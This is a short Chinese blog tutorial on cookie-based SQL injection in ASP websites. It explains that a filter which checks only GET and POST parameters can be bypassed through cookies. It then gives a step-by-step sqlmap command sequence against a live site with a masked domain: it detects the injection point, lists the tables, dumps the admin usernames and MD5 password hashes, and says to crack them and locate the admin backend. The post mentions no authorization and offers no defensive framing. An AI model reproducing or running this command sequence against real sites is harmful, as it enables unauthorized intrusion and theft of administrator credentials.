我先说一下什么是cookies注入,如果你学过ASP,你应该知道Request.QueryString(get)或Requset.FORM)(POST)
这就是我们读取用户发给WEB服务器的指定键的值!
有时我们为了简化代码,会写成
ID=Request("ID")
这样写法是简单,但是问题就来了
cookie注入利用的环境
我们知道WEB服务是怎样读取数据的,他是先GET中的数据,没有再取POST中的数据,还回去取cookies中的数据
我们再看看房主入系统,她会检测GET和POST中的数据。如果有特殊字符(‘ and order by)禁止数据的提交,比如下图所示:
但是它并没有检测cookies中的数据,所以我们就可以对这个网站发动攻击。
可以看到ID=205,所以我们可以用sqlmap对这个网站发动攻击.
1:首先打开sqlmap,需要声明一点,在sqlmap中使用cookie注入,level >=2才行
输入命令:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2
检测到此url含有注入点,再来!
2:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2 --tables 获取数据库中的所有表
3:接下来对这个admin进行检测sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin --column
4:然后对这个username和password进行爆破
sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin -C username,password --dump
5:爆出来后密码是用md5形式加密的,所以拿到相应的网站解密就可以了。然后就是找后台就可以了;
结束!
本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918560